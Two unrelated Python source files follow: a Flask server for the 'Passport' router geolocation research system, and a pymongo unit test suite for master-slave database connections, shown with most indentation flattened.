passport.py
|
# -*- coding: utf-8 -*-
"""
passport.py
~~~~~~~~~~~
Passport: A country-level router geolocation system
This module implements the execution of the main geolocation system (with website) of the Passport system.
:author: Muzammil Abdul Rehman
:credits: [Muzammil Abdul Rehman, Dave Choffnes, Sharon Goldberg]
:copyright: Northeastern University © 2018.
:license: Custom BSD, see LICENSE for more details.
:email: passport@ccs.neu.edu
"""
__author__ = "Muzammil Abdul Rehman"
__copyright__ = "Northeastern University © 2018"
__license__ = "Custom BSD"
__email__ = "passport@ccs.neu.edu"
import sys
import os
import signal
import configs.system
from ppstore import traindata
import ppclassifier
from ppclassifier import GeoLocClassifier
###remove-me-later-muz###from ipwhois import IPWhois
import traceback
from flask import Flask, request, jsonify
import flask
import json
###remove-me-later-muz###import trparse
from multiprocessing import Process, Manager
from threading import Thread
import time
###remove-me-later-muz###from intervaltree import Interval, IntervalTree
import ensemble.extinfluence.quadratic
import ensemble.extinfluence.randomize
import ensemble.extinfluence.proportional
import ensemble.secondaryanalysis
import ensemble.datapts
import ensemble.utils as util_ensemble_code
import geosources
import pputils
from ppmeasurements import util as util_traceroutes
###remove-me-later-muz###import netaddr as ipaddress
import ppnamespace
import geosources.geolocation
from geosources import whois
###remove-me-later-muz###import logging
import ppcore.system.online
import ppcore.system.prediction as prediction_system
import ppcore.system.utils as util_geoloc_system
import routerinfo.aliases as router_alias_package
import world.geography
import datetime
WEB_SERVER_APP = Flask(__name__.split('.')[0],
static_folder=os.path.join(configs.system.WEB_PARENT_FOLDER,
configs.system.WEB_STATIC_FOLDER),
template_folder=os.path.join(configs.system.WEB_PARENT_FOLDER,
configs.system.WEB_TEMPLATES_FOLDER))
##############################################################################
##############################################################################
# Web server - Starts
def get_whois_information(ip_address):
""" Returns the WhoIS information for a speicific IP address"""
return whois.get_whois_information(ip_address)
def run_web_server():
""" This starts a webserver that listens and responds to user requests"""
WEB_SERVER_APP.run(host=configs.system.SERVER_HOST,
port=configs.system.SERVER_PORT, threaded=True,
debug=configs.system.WEB_DEBUG_MODE)
@WEB_SERVER_APP.route('/')
def index_page():
""" The index page when the user lands on the website"""
#return flask.redirect(flask.url_for('v1_locate_ip_address_form'))
return flask.render_template('index.html')
@WEB_SERVER_APP.route('/contact')
def contact_page():
""" Return the page containing the contact infromation of the developers"""
return flask.render_template('contact.html')
@WEB_SERVER_APP.route('/about')
def about_page():
""" Return the page containing the infromation about the developers and the project"""
return flask.render_template('about.html')
@WEB_SERVER_APP.route('/interesting_cases')
def interesting_cases():
return flask.render_template('interesting_cases.html')
@WEB_SERVER_APP.route('/locate_ip_address_form')
def v1_locate_ip_address_form():
""" Returns a form to submit an IP address for geolocation """
return flask.render_template('locate_ip_address_form.html')
@WEB_SERVER_APP.route('/api/v1/locatetrace', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locate_traceroute', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locateip', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locate_ip_address', methods=['GET'])
def api_access_page():
""" Return the redirection page for get requests to the API"""
return flask.render_template('api_access.html')
@WEB_SERVER_APP.route('/locate_ip_address', methods=['POST'])
def v1_locate_ip_address():
""" Returns the web page after posting a request to geolocate an IP address"""
predictions_all = []
ip_address = request.form['ip_address']
predictions_dict = v1_locateip(ip_address)
predictions_all.append(predictions_dict)
# package data in a traceroute object
predictions_dict_traceroute = {'error': predictions_dict['error'],
'error_type': predictions_dict['error_type'],
'status': predictions_dict['status'],
'completed': True,
'dest_name': '',
'dest_ip': '',
'predictions': predictions_all}
if predictions_dict_traceroute['status'] != 'finished':
predictions_dict_traceroute['completed'] = False
# get countries
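# (invert the ISO-code -> country-name mapping so the template can look up codes by name)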
country_name_dict = {}
country_name_dict = {ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND[cde]:cde
for cde in ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND}
return flask.render_template('locate_ip_address.html', traceroute_info_object=predictions_dict_traceroute,
predictions=predictions_dict_traceroute['predictions'],
status=predictions_dict_traceroute['status'],
error_type=predictions_dict_traceroute['error_type'],
error=predictions_dict_traceroute['error'], country_name_to_code=country_name_dict)
@WEB_SERVER_APP.route('/api/v1/locateip', methods=['POST'])
@WEB_SERVER_APP.route('/api/v1/locate_ip_address', methods=['POST'])
def v1_api_locate_ip_address():
""" Requests an IP geolocation (using API) if not already requested, and returns the information about that
IP address (if infromation is available)
# input: {'ip': 12.3.12.1}
# output: {"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.200.204.2",
# "hostname": "10.200.204.2", "overall": [], "combined": [], "hop": 1, "error": True, "classifier": []}
"""
data = request.data
return_data = {'error': True, 'error_type': 'Invalid Input'}
try:
data_dict = json.loads(data)
if 'ip' not in data_dict or (type(data_dict['ip']) != str and type(data_dict['ip']) != unicode):
return return_data
except:
return_data['error_type'] = 'Invalid Input: Please provide a JSON object.'
return return_data
predictions_dict = v1_locateip(data_dict['ip'])
return jsonify(predictions_dict)
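# A minimal, hypothetical client sketch for the endpoint above. It assumes the
# server is reachable at `base_url` (the real host/port come from configs.system)
# and that the `requests` package is installed; it is not used by the Passport
# system itself.
def _example_locate_ip_client(ip_address, base_url='http://localhost:5000'):
    """Post {'ip': <address>} to /api/v1/locate_ip_address and return the parsed JSON reply."""
    import requests
    resp = requests.post(base_url + '/api/v1/locate_ip_address',
                         data=json.dumps({'ip': ip_address}))
    return resp.json()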
def v1_locateip(ip_address):
"""
Requests that the online system add an IP address to the measurement queue and returns the result.
:param ip_address: a string representation of an IPv4 address
:return predictions_dict: A dictionary containing information about errors, predicted locations and status of IP.
"""
#predictions_all = []
predictions_dict = ppcore.system.online.get_predictions_ip_address(ip_address)
#predictions_all.append(predictions_dict)
#online_system.sort_on_hop_number(predictions_all)
print_data = "v1_locateip: " + str(predictions_dict)
WEB_SERVER_APP.logger.debug(print_data)
return predictions_dict
@WEB_SERVER_APP.route('/locate_traceroute_form')
def v1_locate_traceroute_form():
""" Returns the web page after posting a request to geolocate all IP addresses of a traceroute"""
return flask.render_template('locate_traceroute_form.html')
@WEB_SERVER_APP.route('/locate_traceroute', methods=['POST'])
def v1_locate_traceroute():
""" Returns the web page after posting a request to geolocate all IP addresses of a trsceroute"""
traceroute_data = request.form['traceroute_data']
predictions_dict_traceroute = v1_locatetrace(traceroute_data)
#WEB_SERVER_APP.logger.debug(globals_file.COUNTRY_ISO_CODE_DICT)
country_name_dict = {}
country_name_dict = {ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND[cde]:cde
for cde in ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND}
return flask.render_template('locate_traceroute.html',traceroute_info_object=predictions_dict_traceroute,
predictions=predictions_dict_traceroute['predictions'],
status=predictions_dict_traceroute['status'],
error_type=predictions_dict_traceroute['error_type'],
error=predictions_dict_traceroute['error'], country_name_to_code=country_name_dict)
@WEB_SERVER_APP.route('/api/v1/locatetrace', methods=['POST'])
@WEB_SERVER_APP.route('/api/v1/locate_traceroute', methods=['POST'])
def v1_api_locate_traceroute():
""" Requests IP geolocation (using API) of all IPs in traceroutes if not already requested. Also parses and
checks the validity of the traceroute.
# input: {'traceroute_data': "some string about traceroutes"}
# output:
{"status": "running", "dest_name": "10.200.204.2", "completed": False, "error_type": "", "predictions": [
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.200.204.2",
"hostname": "10.200.204.2", "overall": [], "combined": [], "hop": 1, "error": True, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "129.10.110.2", "hostname": "129.10.110.2",
"overall": [], "combined": [], "hop": 2, "error": False, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.52",
"hostname": "10.2.29.52", "overall": [], "combined": [], "hop": 3, "error": True, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.33",
"hostname": "10.2.29.33", "overall": [], "combined": [], "hop": 4, "error": True, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.230",
"hostname": "10.2.29.230", "overall": [], "combined": [], "hop": 5, "error": True, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "207.210.142.101",
"hostname": "nox1sumgw1-neu-cps.nox.org", "overall": [], "combined": [], "hop": 6, "error": False,
"classifier": []}, {"status": "finished", "error_type": "",
"area": ["United States", "Canada", "Bermuda", "Saint Pierre and Miquelon"],
"ip": "198.71.47.61", "hostname": "et-10-0-0.122.rtr.eqch.net.internet2.ed",
"overall": ["United States"], "combined": ["United States"], "hop": 7, "error": False,
"classifier": ["United States"]},
{"status": "running", "error_type": "", "area": [], "ip": "72.14.220.117", "hostname": "72.14.220.117",
"overall": [], "combined": [], "hop": 8, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "108.170.243.193", "hostname": "108.170.243.193",
"overall": [], "combined": [], "hop": 9, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "216.239.42.107", "hostname": "216.239.42.107",
"overall": [], "combined": [], "hop": 10, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "216.58.192.206",
"hostname": "ord30s25-in-f206.1e100.net", "overall": [], "combined": [], "hop": 11, "error": False,
"classifier": []}], "error": False, "dest_ip": "10.200.204.2"}
"""
data = request.data
return_data = {'error': True, 'error_type': 'Invalid Input.', 'status': 'failed', 'predictions': []}
try:
data_dict = json.loads(data)
if 'traceroute_data' not in data_dict or (type(data_dict['traceroute_data']) != str and type(data_dict['traceroute_data']) != unicode):
return return_data
except:
return_data['error_type'] = 'Invalid Input: Please provide a JSON object.'
return return_data
predictions_dict_traceroute = v1_locatetrace(str(data_dict['traceroute_data']))
return jsonify(predictions_dict_traceroute)
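# A similar hypothetical client sketch for the traceroute endpoint above
# (same assumptions as _example_locate_ip_client).
def _example_locate_traceroute_client(traceroute_text, base_url='http://localhost:5000'):
    """Post {'traceroute_data': <text>} to /api/v1/locate_traceroute and return the parsed JSON reply."""
    import requests
    resp = requests.post(base_url + '/api/v1/locate_traceroute',
                         data=json.dumps({'traceroute_data': traceroute_text}))
    return resp.json()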
def v1_locatetrace(traceroute_data_string):
"""
Tries to parse a string and convert it to machine-readable traceroute information, then performs geolocation on
all IP addresses.
:param traceroute_data_string: same data type as `func` v1_api_locate_traceroute()
:return: same data type as `func` v1_api_locate_traceroute()
"""
predictions_all = []
return_data = {'error': False,
'error_type': '',
'status': 'running',
'completed': False,
'dest_name': '',
'dest_ip': '',
'predictions': predictions_all}
# convert a string to a list using external libraries
success, trparse_list = util_traceroutes.traceroute_string_to_list(traceroute_data_string)
# if parsing the traceroute string failed, return early
if not success:
return_data['status'] = 'failed' # finished, failed, running,
return_data['error'] = True
return_data['error_type'] = 'Invalid Traceroute: Please provide a correct traceroute.'
return return_data
# if successful
return_data['dest_name'] = trparse_list.dest_name
return_data['dest_ip'] = trparse_list.dest_ip
# for each hop, request geolocation
for hop in trparse_list.hops:
# we only do one probe
hop_idx = hop.idx
for probe in hop.probes:
if probe.ip is None:
continue
hostname = probe.name
if probe.name is None:
hostname = ''
predictions_dict = ppcore.system.online.get_predictions_ip_address(probe.ip, hostname, hop_idx)
predictions_all.append(predictions_dict)
break
# sorting the results is important for website display
ppcore.system.online.sort_on_hop_number(predictions_all)
return_data['predictions'] = predictions_all
return_data['status'] = 'finished' # finished, failed, running,
return_data['completed'] = True
# check whether all the IP addresses have been located
for pred in predictions_all:
if pred['status'] != 'finished':
return_data['status'] = 'running' # finished, failed, running,
if return_data['status'] != 'finished':
return_data['completed'] = False
return return_data
@WEB_SERVER_APP.errorhandler(404)
def page_not_found(error):
return 'This page does not exist', 404
@WEB_SERVER_APP.route('/api/v1/geosources', methods=['POST'])
def api_geosources():  # renamed so it does not shadow the imported geosources module it calls
data = request.data
data_list = json.loads(data)
return json.dumps(geosources.geolocation.get_inaccurate_locations(data_list[0]))
@WEB_SERVER_APP.route('/api/v1/whois', methods=['POST'])
def api_whois():  # renamed so it does not shadow the whois module imported from geosources
""" A function to get WHOIS information about an IP address """
#WEB_SERVER_APP.logger.warning('A warning occurred (%d apples)', 42)
#WEB_SERVER_APP.logger.error('An error occurred')
#WEB_SERVER_APP.logger.info('Info')
data = request.data
data_list = json.loads(data)
#print data_list
return json.dumps(whois.get_whois_information(data_list[0]))
@WEB_SERVER_APP.route('/api/v1/test_classifier', methods=['POST'])
def testclassifier():
""" A function to test classifier predictions """
data = request.data
test_data = json.loads(data)
pred_results = []
for loaded_cls in ppnamespace.LOADED_CLASSIFIERS:
pred_data = loaded_cls.predict(test_data)
#print pred_data
for i in xrange(len(pred_data)):
if i % 2 == 0:
elem = loaded_cls.classifier_name + "_" + pred_data[i]
else:
elem = pred_data[i]
pred_results.append(elem)
return json.dumps(pred_results)
# Web server - Ends
##############################################################################
##############################################################################
global RUNNING_PROCESSES
RUNNING_PROCESSES = []
global RUNNING_THREADS
RUNNING_THREADS = []
global MANAGER
MANAGER = Manager()
ppnamespace.init(MANAGER)
def close_program(graceful_close):
""" Cleaning exit the system and kill all the processes """
# close the flask process.
#globals_file.SYSTEM_DICT_MAIN[configs.system.SYSTEM_PROC_RUNNING] = False
for process in RUNNING_PROCESSES:
try:
if not graceful_close:
process.terminate()
process.join()
except:
pass
sys.exit(0)
def signal_handler(signal, frame):
close_program(False)
def redo_analysis():
"""Perfoms the offlline classifier analysis, only."""
current_processes = []
# primary analysis for the three types of external influence (number of instances) on the country prediction
proc = Process(target=ensemble.extinfluence.quadratic.main)
current_processes.append(proc)
proc = Process(target=ensemble.extinfluence.randomize.main)
current_processes.append(proc)
proc = Process(target=ensemble.extinfluence.proportional.main)
current_processes.append(proc)
for proc in current_processes:
RUNNING_PROCESSES.append(proc)
proc.start()
for proc in current_processes:
proc.join()
try:
RUNNING_PROCESSES.remove(proc)
except:
pass
# secondary analysis using the second derivative and max points
ensemble.secondaryanalysis.perform_secondary_analysis()
# generate a file containing the number of instances :)
ensemble.datapts.generate_data_points()
# This is the folder called 8. If you want to compare with the proportional
# variant, take the number_against_countrydata.py file, rename it to
# generate_points_data, and modify it like the secondary analysis file. Until
# then, use the points generated from the secondary analysis file and add
# simple 30- and 50-instance classifiers as well.
def train_classifiers_after_analyis():
""" Train all the new classifiers after running an offline analysis on the ground truth."""
# get country-based training data
countries_with_count = traindata.get_all_countries()
countries_with_count.sort(key=lambda k: k['count'])
country_training_data = {}
for country in countries_with_count:
cnt_data = traindata.get_training_data_country(country)
country_training_data[country['country']] = cnt_data
# load the csv file containing the number of points for each classifier.
DATA_PTS_FILES = util_ensemble_code.get_files_relative_folder('', '.csv')
data_pts_file = DATA_PTS_FILES[configs.system.GENERATE_DATA_POINTS_FILE_PTS]
IMPORTANT_COLUMNS = [2, 3, 7, 9, 13, 14]
remove_symbols = [' ', '/', '(', ')']
# train multiple variants of each classifier
for i in range(configs.system.NUM_VARIANTS_CLS):
for col in IMPORTANT_COLUMNS:
f_name = data_pts_file[0][col]
f_name = f_name.lower()
for sym in remove_symbols:
f_name = f_name.replace(sym, "_")
f_name = f_name + "_" + str(i) + ".pkl"
num_inst = {}
for row in data_pts_file:
cnt_nme = row[0].split('.txt')[0]
try:
num_inst[cnt_nme] = int(float(row[col]))
except:
num_inst[cnt_nme] = 1
# get training data
train = util_ensemble_code.choose_train_data(country_training_data,
num_inst)
train = util_ensemble_code.add_nac(train, 50)
# train
print "Training: ", f_name
geoloc_cls = GeoLocClassifier()
geoloc_cls.train_classifier(train)
if not ppclassifier.save_classifier(geoloc_cls, f_name):
print "Failed to save:", f_name
# save the classifier
ppnamespace.LOADED_CLASSIFIERS.append(geoloc_cls)
def train_default_classifier():
""" Train a classifier using the entire training dataset """
train = traindata.get_training_data_all()
train = util_ensemble_code.add_nac(train, 50)
geoloc_cls_default = GeoLocClassifier()
geoloc_cls_default.train_classifier(train)
if not ppclassifier.save_classifier(geoloc_cls_default,
configs.system.DEFAULT_CLS_FILE):
print "Failed to save a default classifier. Will serve only from mem."
ppclassifier.delete_classifier(configs.system.DEFAULT_CLS_FILE)
ppnamespace.LOADED_CLASSIFIERS.append(geoloc_cls_default)
print "Default classifier saved."
def read_values_to_geo_sources():
pputils.read_values_to_geo_sources()
def thread_process_geolocate_ip_addresses():
""" A process that maintains a queue and schedules measurements from vantage points at regular intervals
so as to never overwhelm the remote machines (VPs)"""
while True:
#print "IPs to look up:", globals_file.QUEUE_IPS_LOOKUP.qsize()
# ip address processing thread
ip_addresses_to_proc = []
if ppnamespace.QUEUE_IPS_LOOKUP.empty():
time.sleep(configs.system.THREAD_IP_PROCESSING_WAIT)
continue
while not ppnamespace.QUEUE_IPS_LOOKUP.empty():
try:
ip_addr_proc, hostname = ppnamespace.QUEUE_IPS_LOOKUP.get(False)
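# skip IP addresses that already have predictions in the system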
suc = util_geoloc_system.in_system_predictions(ip_addr_proc)
if suc:
continue
ip_addresses_to_proc.append((ip_addr_proc, hostname))
if len(ip_addresses_to_proc) >= configs.system.MAX_IPS_PROCESSING:
break
except:
traceback.print_exc()
pass
# schedule measurements for these all.
thread_list = []
for ip_addr,hostnm in ip_addresses_to_proc:
p = Thread(target=ppcore.system.online.perform_measurement_prediction_ip_address, args=(ip_addr, hostnm,))
p.daemon = False
thread_list.append(p)
for p in thread_list:
p.start()
for p in thread_list:
p.join()
try:
del thread_list[:] #delete elements
except:
pass
def main():
"""The program to perform offline analysis (if necessary) then start background threads to setup the measurement
system as well as the website"""
# don't remove this line since strptime is not threadsafe
datetime.datetime.strptime(datetime.datetime.now().strftime('%Y%m%d%H%M%S'),'%Y%m%d%H%M%S')
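# (the first strptime call imports the _strptime module; doing it once here avoids a race
# when worker threads later call strptime concurrently)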
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Load classifiers either from disk or create new ones
if configs.system.TRAIN_NEW_CLASSIFIERS:
# train a default classifier
train_default_classifier()
# redo analysis
redo_analysis()
# retrain new classifiers and add them
train_classifiers_after_analyis()
elif configs.system.RETRAIN_CLASSIFIERS_WITHOUT_ANALYSIS_AGAIN:
# train a default classifier
train_default_classifier()
# retrain new classifiers and add them
train_classifiers_after_analyis()
else:
classifiers_from_disk = ppclassifier.load_all_classifiers()
for cls in classifiers_from_disk:
ppnamespace.LOADED_CLASSIFIERS.append(cls)
print "Loaded Classifiers"
# Load past predictions
# globals_file.overall, globals_file.classifier, globals_file.area, globals_file.combined =
# prediction_system.load_all_prediction_systems()
prediction_system.load_all_prediction_systems_into_manager(ppnamespace.overall, ppnamespace.classifier,
ppnamespace.area, ppnamespace.combined)
print "Loaded Prediction Systems"
# Load router aliases and country maps
ppnamespace.router_aliases_dict = router_alias_package.get_router_aliases() # move to parent function
ppnamespace.country_polygon_dict = world.geography.load_country_maps() # move to parent function
print "Loaded Maps and Aliases"
# read global variable
pputils.get_country_name_iso_code_dict(ppnamespace.COUNTRY_ISO_CODE_DICT)
pputils.get_country_name_iso_code_dict(ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND)
# read the global variables
pputils.read_values_to_geo_sources()
# create threads and name them
# thread-1: reads queue, processes the ip addresses as required (don't use processes)
proc = Process(target=thread_process_geolocate_ip_addresses, name=configs.system.THREAD_NAME_IP_PROCESSING)
RUNNING_PROCESSES.append(proc)
proc.start()
# thread-2: saves global structures (area, classifier, overall, combined) to disk
# start the flask server, whois, test, test ensemble in a new process
proc = Process(target=run_web_server)
RUNNING_PROCESSES.append(proc)
proc.start()
# run the algorithm every x seconds and update the database.
# close all
close_program(True)
if __name__ == "__main__":
main()
#train_default_classifier()
#train_classifiers_after_analyis()
#ensemble_code.generate_data_points.main()
"""
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if configs.system.TRAIN_NEW_CLASSIFIERS:
# train a default classifier
train_default_classifier()
else:
classifiers_from_disk = ppclassifier.load_all_classifiers()
for cls in classifiers_from_disk:
globals_file.LOADED_CLASSIFIERS.append(cls)
#main()
p = Process(target=run_web_server)
RUNNING_PROCESSES.append(p)
p.start()
close_program(True)
"""
|
test_master_slave_connection.py
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for master slave connections."""
import datetime
import os
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo import ReadPreference, thread_util
from pymongo.errors import ConnectionFailure, InvalidName
from pymongo.errors import CollectionInvalid, OperationFailure
from pymongo.errors import AutoReconnect
from pymongo.database import Database
from pymongo.mongo_client import MongoClient
from pymongo.collection import Collection
from pymongo.master_slave_connection import MasterSlaveConnection
from test import host, port, host2, port2, host3, port3
from test.utils import TestRequestMixin, get_pool
class TestMasterSlaveConnection(unittest.TestCase, TestRequestMixin):
def setUp(self):
self.master = MongoClient(host, port)
self.slaves = []
try:
self.slaves.append(MongoClient(
host2, port2, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
try:
self.slaves.append(MongoClient(
host3, port3, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
if not self.slaves:
raise SkipTest("Not connected to master-slave set")
self.client = MasterSlaveConnection(self.master, self.slaves)
self.db = self.client.pymongo_test
def tearDown(self):
try:
self.db.test.drop_indexes()
except Exception:
# Tests like test_disconnect can monkey with the client in ways
# that make this fail
pass
self.master = self.slaves = self.db = self.client = None
super(TestMasterSlaveConnection, self).tearDown()
def test_types(self):
self.assertRaises(TypeError, MasterSlaveConnection, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, [1])
def test_use_greenlets(self):
self.assertFalse(self.client.use_greenlets)
if thread_util.have_gevent:
master = MongoClient(host, port, use_greenlets=True)
slaves = [
MongoClient(slave.host, slave.port, use_greenlets=True)
for slave in self.slaves]
self.assertTrue(
MasterSlaveConnection(master, slaves).use_greenlets)
def test_repr(self):
self.assertEqual(repr(self.client),
"MasterSlaveConnection(%r, %r)" %
(self.master, self.slaves))
def test_disconnect(self):
class MongoClient(object):
def __init__(self):
self._disconnects = 0
def disconnect(self):
self._disconnects += 1
self.client._MasterSlaveConnection__master = MongoClient()
self.client._MasterSlaveConnection__slaves = [MongoClient(),
MongoClient()]
self.client.disconnect()
self.assertEqual(1,
self.client._MasterSlaveConnection__master._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[0]._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[1]._disconnects)
def test_continue_until_slave_works(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return (None, 'sent')
class NotRandomList(object):
last_idx = -1
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(False), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
NotRandomList.last_idx = idx
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
response = self.client._send_message_with_response('message')
self.assertEqual((NotRandomList.last_idx, 'sent'), response)
self.assertNotEqual(-1, NotRandomList.last_idx)
self.assertEqual(3, Slave.calls)
def test_raise_autoreconnect_if_all_slaves_fail(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return 'sent'
class NotRandomList(object):
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(True), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
self.assertRaises(AutoReconnect,
self.client._send_message_with_response, 'message')
self.assertEqual(4, Slave.calls)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client,
"test"))
def test_database_names(self):
self.client.pymongo_test.test.save({"dummy": u"object"})
self.client.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database("pymongo_test")
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database(self.client.pymongo_test)
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_insert_find_one_in_request(self):
count = 0
for i in range(100):
self.client.start_request()
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.client.end_request()
self.assertFalse(count)
def test_nested_request(self):
client = self.client
def assertRequest(in_request):
self.assertEqual(in_request, client.in_request())
self.assertEqual(in_request, client.master.in_request())
# MasterSlaveConnection is special, alas - it has no auto_start_request
# and it begins *not* in a request. When it's in a request, it sends
# all queries to primary.
self.assertFalse(client.in_request())
self.assertFalse(client.master.in_request())
# Start and end request
client.start_request()
assertRequest(True)
client.end_request()
assertRequest(False)
# Double-nesting
client.start_request()
client.start_request()
client.end_request()
assertRequest(True)
client.end_request()
assertRequest(False)
def test_request_threads(self):
client = self.client
# In a request, all ops go through master
pool = get_pool(client.master)
client.master.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
started_request, ended_request = threading.Event(), threading.Event()
checked_request = threading.Event()
thread_done = [False]
# Starting a request in one thread doesn't put the other thread in a
# request
def f():
self.assertNotInRequestAndDifferentSock(client, pool)
client.start_request()
self.assertInRequestAndSameSock(client, pool)
started_request.set()
checked_request.wait()
checked_request.clear()
self.assertInRequestAndSameSock(client, pool)
client.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
ended_request.set()
checked_request.wait()
thread_done[0] = True
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
started_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
ended_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
t.join()
self.assertNotInRequestAndDifferentSock(client, pool)
self.assertTrue(thread_done[0], "Thread didn't complete")
# This was failing because commands were being sent to the slaves
def test_create_collection(self):
self.client.pymongo_test.test.drop()
collection = self.db.create_collection('test')
self.assertTrue(isinstance(collection, Collection))
self.assertRaises(CollectionInvalid, self.db.create_collection, 'test')
# Believe this was failing for the same reason...
def test_unique_index(self):
self.client.pymongo_test.test.drop()
self.db.test.create_index('username', unique=True)
self.db.test.save({'username': 'mike'})
self.assertRaises(OperationFailure,
self.db.test.save, {'username': 'mike'})
# NOTE this test is non-deterministic, but I expect
# some failures unless the db is pulling instantaneously...
def test_insert_find_one_with_slaves(self):
count = 0
for i in range(100):
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertTrue(count)
# NOTE this test is non-deterministic, but hopefully we pause long enough
# for the slaves to pull...
def test_insert_find_one_with_pause(self):
count = 0
self.db.test.remove({})
self.db.test.insert({"x": 5586})
time.sleep(11)
for _ in range(10):
try:
if 5586 != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertFalse(count)
def test_kill_cursor_explicit(self):
c = self.client
c.slave_okay = True
db = c.pymongo_test
test = db.master_slave_test_kill_cursor_explicit
test.drop()
for i in range(20):
test.insert({"i": i}, w=1 + len(self.slaves))
st = time.time()
while time.time() - st < 120:
# Wait for replication -- the 'w' parameter should obviate this
# loop but it's not working reliably in Jenkins right now
if list(test.find({"i": 19})):
break
time.sleep(0.5)
else:
self.fail("Replication timeout, test coll has %s records" % (
len(list(test.find()))
))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
self.assertNotEqual(
cursor._Cursor__connection_id,
-1,
"Expected cursor connected to a slave, not master")
self.assertTrue(cursor.next())
self.assertNotEqual(0, cursor.cursor_id)
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_base_object(self):
c = self.client
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({}, db.get_lasterror_options())
